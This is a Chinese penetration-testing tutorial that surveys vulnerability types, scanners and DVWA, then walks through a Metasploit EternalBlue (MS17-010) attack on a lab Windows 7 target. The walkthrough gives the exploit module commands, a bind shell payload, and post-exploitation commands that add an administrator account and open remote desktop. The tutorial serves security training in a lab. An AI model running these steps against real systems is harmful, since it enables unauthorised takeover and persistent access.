渗透测试--2.漏洞探测和利用

news2024/11/24 11:35:04

目录

一.漏洞分类

二.漏洞探测

三.漏洞利用

四.漏洞扫描

1.Nessus

2.Web应用漏洞扫描器——DVWA

五.Metasploit漏洞利用


一.漏洞分类

  • 网络漏洞
  • 系统漏洞
  • 应用漏洞
  •  人为不当配置

二.漏洞探测

渗透测试是一种测试网络、应用程序和系统安全性的方法,旨在发现并利用漏洞和安全漏洞,以评估系统的安全性。

以下是一些漏洞探测的方法:

  1. 端口扫描:通过扫描目标系统上的端口,确定哪些服务正在运行,以及它们的版本和配置信息。渗透测试人员可以使用常见工具如Nmap、Metasploit等进行端口扫描。

  2. 漏洞扫描:渗透测试人员可以使用漏洞扫描工具来扫描目标系统上已知的漏洞,并尝试利用它们。常见的漏洞扫描工具有Nessus、OpenVAS等。

  3. 社会工程学:社会工程学是一种利用人类心理学和社交工具的技术,目的是获取敏感信息或访问受保护的系统。渗透测试人员可以使用社会工程学技术来获取用户名和密码等敏感信息。

  4. 模糊测试:渗透测试人员可以使用模糊测试技术来发现应用程序的漏洞。模糊测试是一种随机输入的技术,用于测试应用程序的边界条件和异常情况。

  5. 嗅探:嗅探是一种技术,可以捕获正在传输的数据包,并分析其中的信息。渗透测试人员可以使用嗅探技术来获取敏感信息,例如用户名和密码。

渗透测试是一项复杂的任务,需要深入了解目标系统的结构和漏洞,以及掌握多种工具和技术来发现和利用漏洞。

三.漏洞利用

漏洞利用是指利用已知或未知漏洞来攻击目标系统或应用程序,以获得未经授权的访问或执行恶意操作。以下是一些常见的漏洞利用方法:

  1. 缓冲区溢出:缓冲区溢出是指攻击者利用程序中的缓冲区溢出漏洞,覆盖程序的栈或堆,以执行恶意代码或控制程序的执行流程。

  2. SQL注入:SQL注入是指攻 击者通过向应用程序输入恶意SQL语句来获取敏感数据或控制数据库。

  3. XSS攻击:XSS攻击是指攻击者通过注入恶意脚本来欺骗用户,从而窃取用户的信息或执行恶意操作。

  4. CSRF攻击:CSRF攻击是指攻击者利用用户在已登录的状态下,向应用程序发送恶意请求,从而执行未经授权的操作。

  5. 文件包含漏洞:文件包含漏洞是指攻击者利用应用程序中的文件包含漏洞,向服务器请求包含恶意脚本的文件,从而执行恶意操作。

漏洞利用需要深入了解目标系统或应用程序的漏洞,以及掌握各种技术和工具来执行攻击。同时,漏洞利用是非法的行为,可能会导致严重的安全问题和法律后果。因此,建议只在合法授权和道德准则下进行漏洞利用。


四.漏洞扫描

1.Nessus

Nessus是一款C/S架构的漏洞扫描系统,作为一款漏洞扫描软件,不仅功能全面,

而且还可以实时更新漏洞库,据统计有超过75,000个机构在使用它。该工具提供完整的电

脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,

Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描

注册安装:kali安装Nessus_太菜是我的的博客-CSDN博客

2.Web应用漏洞扫描器——DVWA

DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的 PHP/MySQL Web 应用(Web 渗透技巧的靶机环境)。

其主要目标是帮助安全专业人员 在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序 的过程。

DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。

DVWA共有十个模块:

Brute Force(暴力破解)

Command Injection(命令行注入)

CSRF(跨站请求伪造)

File Inclusion(文件包含)

File Upload(文件上传)

Insecure CAPTCHA (不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

XSS(Stored)(存储型跨站脚本)

五.Metasploit漏洞利用

Metasploit是一款开源的安全漏洞检测工具。它可以帮助网络安全测试人员识别安全

性问题,验证漏洞的解决措施,从而完成对目标的安全性评估。


metasploit 利用 MS17-010 永恒之蓝漏洞进行攻击

1.实验环境

操作机:kali-linux-2022.4-vmware-amd64.vmwarevm
目标机: metasploitable3(Windows 7)(含多种漏洞)


2.主机扫描

靶机ip:192.168.76.138

主机扫描:nmap -sP 192.168.76.138

端口扫描:nmap -Pn 192.168.76.138


3.漏洞利用

首先打开msfconsole,利用 metasploit

找到永恒之蓝(ms17-010)对应的模块:search ms17-010 

 扫描模块位置:
 auxiliary/scanner/smb/smb_ms17_010    
 
 攻击代码位置:
 exploit/windows/smb/ms17_010_eternalblue
 exploit/windows/smb/ms17_010_eternalblue_win8  
 exploit/windows/smb/ms17_010_psexec            
 exploit/windows/smb/smb_doublepulsar_rce 

利用永恒之蓝扫描,查看是否可以对目标机利用ms17-010

use auxiliary/scanner/smb/smb_ms17_010   
set RHOSTS 192.168.76.138    设置远端ip
run

利用payload攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.76.138     //设置被攻击者的IP
set lhost 192.168.76.134       

set payload windows/x64/shell/bind_tcp//获取靶机权限

//设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell
run

攻击成功,成功获取shell


 4.后期渗透阶段

在靶机上创建新用户

net user 用户名 密码 /add

net user gyp gyp /add

将用户gyp添加至管理员组

net localgroup administrators gyp /add

net user //便可查看创建的用户

  


开启远程桌面

第一步:查看3389端口是否开启

查看端口命令:netstat -ano

第二步:再开启一个终端

输入命令:rdesktop 192.168.76.138

入侵系统成功:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/530394.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Xilinx FPGA DDR3设计(三)DDR3 IP核详解及读写测试

引言:本文我们介绍下Xilinx DDR3 IP核的重要架构、IP核信号管脚定义、读写操作时序、IP核详细配置以及简单的读写测试。 01.DDR3 IP核概述 7系列FPGA DDR接口解决方案如图1所示。 图1、7系列FPGA DDR3解决方案 1.1 用户FPGA逻辑(User FPGA Logic&#…

玩转Google开源C++单元测试框架Google Test系列(gtest)之七 - 深入解析gtest

一、前言 “深入解析”对我来说的确有些难度,所以我尽量将我学习到和观察到的gtest内部实现介绍给大家。本文算是抛砖引玉吧,只能是对gtest的整体结构的一些介绍,想要了解更多细节最好的办法还是看gtest源码,如果你看过gtest源码…

麒麟操作系统软件更新灾难连篇之一:中文输入法消失

今天在麒麟操作系统开QQ总是过一会儿就闪退,于是进软件商店看看是否有更新。 真是不看不知道,一看吓一跳,居然有几十个软件更新,照常理,软件升级后应该是更加好用,于是先把QQ、五笔字型、搜狗输入法等几个常…

centos7.9搭建redis6.0.6哨兵模式

redis6.0.6哨兵模式搭建文档 1.准备工作1.1 ip规划安装依赖(三台机器都操作)1.3 gcc升级(三台机器都操作) 2.安装redis(三台机器都操作)2.1 获取安装包2.2 解压2.3 编译2.4 验证上一步是否正确2.5 安装2.6…

Windows10安装二进制Mysql-5.7.41和汉化

1.创建my.ini [mysqld] ##skip-grant-tables1 port 3306 basedirD:/webStudy/mysql-5.7.41 datadirE:/adata/mysqlData max_connections200 character-set-serverutf8 default-storage-engineINNODB sql_modeNO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES [mysql] default-char…

Liunx基础命令 - which命令

which命令 – 查找命令文件 ​ which命令的功能是用于查找命令文件,能够快速搜索二进制程序所对应的位置。如果我们既不关心同名文件(find与locate),也不关心命令所对应的源代码和帮助文件(whereis)&#…

C++中类的静态成员变量与静态成员函数

static声明为静态的,称为静态成员。 不管这个类创建了多少个对象,静态成员只有一个拷贝,这个拷贝被所有属于这个类的对象共享。 静态成员 属于类 而不是对象。 静态变量,是在编译阶段就分配空间,对象还没有创建时&…

ARM-栈帧(一)

ARM 栈帧 本系列均以 corter-A7(armv7-a) 为例 在 ARM 中,通常为满减栈(Full Descending FD), 也就是说,堆栈指针指向堆栈内存中最后一个填充的位置,并且随着每个新数据项被压入堆栈而递减。 栈的本质 要理解栈的本…

二叉搜索树、AVL树、红黑树底层源码以及迭代器模拟实现,map/set的封装

这次给大家分享的还是关于二叉树部分的内容,之前的文章已经分享过一些二叉树的基础知识,如果不了解的朋友可以看看:二叉树以及堆和堆排序。普通的二叉树其实是没有什么实际的应用价值的,而map和set大家用过或者听过吗?…

Metasploit Framework(MSF)对Metasploitable2的渗透解析

简介 Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。 其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。 并且开放了很多的高危端口如21、23、445等,而且具有…

李薇:大模型时代的数据变革

Datawhale干货 作者:李薇,上海人工智能实验室 前言 今天,我将向那些希望深入了解大模型的同学们,分享一些关于大模型时代的数据变革的知识。作为上海人工智能实验室OpenDataLab的产品主管,我会介绍我们在开放数据和大…

大数据技术闲侃之岗位选择解惑

前言 写下这篇文章是因为五一节前给群友的承诺,当然按照以往的惯例,也是我背后看到的这个现象,我发现大部分同学在投递岗位的时候都是投递数据分析岗位,其实背后并不是很清楚背后的岗位是做啥的,想想我自己的工作生涯…

用户/用户组管理

用户管理 * useradd 命令添加用户,会在/etc/passwd生成用户信息,信息分为7列,被6个冒号隔开 第一列 username (login name) 第二列 密码,但是该列已经被移除,用x表示,密码信息已经存放在了/etc/shadow文…

Android以aar包形式引入hunter-debug,Java(3)

Android以aar包形式引入hunter-debug,Java(3) (1)首先把hunter的master分支代码拉下来,在本地编译, https://github.com/Leaking/Hunterhttps://github.com/Leaking/Hunter此过程主要目的是获得…

理解学习曲线:芯片工作中的平台价值和个人价值

作为一名芯片工程师,从毕业出到步入公司的第一天开始,需要完成一次明显的转变,随着工作的日益开展和项目推进,个人能力的也得到了潜移默化的提升,当我们回看个人的知识/技能成长的曲线时,可能会发现很多的发…

CMake:递归检查并拷贝所有需要的DLL文件

文章目录 1. 目的2. 设计整体思路多层依赖的处理获取 DLL 所在目录探测剩余的 DLL 文件 3. 代码实现判断 stack 是否为空判断 stack 是否为空获取所有 target检测并拷贝 DLL 4. 使用 1. 目的 在基于 CMake 构建的 C/C 工程中,拷贝当前工程需要的每个DLL文件到 Visu…

将nacos从本地切换到远程服务器上时报错:客户端端未连接,Client not connected

报错信息: 09:34:38.438 [com.alibaba.nacos.client.Worker] ERROR com.alibaba.nacos.common.remote.client - Send request fail, request ConfigBatchListenRequest{headers{charsetUTF-8, Client-AppNameunknown, Client-RequestToken65c0fbf47282ae0a7b85178…

android点击事件,跳转界面

Android 事件处理 1&#xff0c;采用在Activity中创建一个内部类定义点击事件 主要xml代码 <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas.android.com/apk/res/android"xmlns:app"http:…

【SAP Abap】X-DOC:SE37 - ABAP 功能模块之更新模块(Function Module 之 Update module)

【SAP Abap】X-DOC&#xff1a;SE37 - ABAP 功能模块之更新模块&#xff08;Function Module 之 Update module&#xff09; 1、简介1.1、什么是更新函数1.2、更新函数的类型1.3、更新函数的参数要求1.4、更新函数的调用方式1.5、更新函数的调试方式1.6、更新任务的执行模式1.7…

C语言——控制语句

目录 1. 分支语句1.1 if语句1.1.1 基本结构1.1.2 分层结构1.1.3 嵌套结构 1.2 switch case 语句 2.循环语句2.1 for循环2.1.1 基本结构2.1.2 嵌套结构2.1.3 变形 2.2 while循环2.3 do while循环2.4 死循环2.5 循环控制语句 控制语句即用来实现对程序流程的选择、循环、转向和返…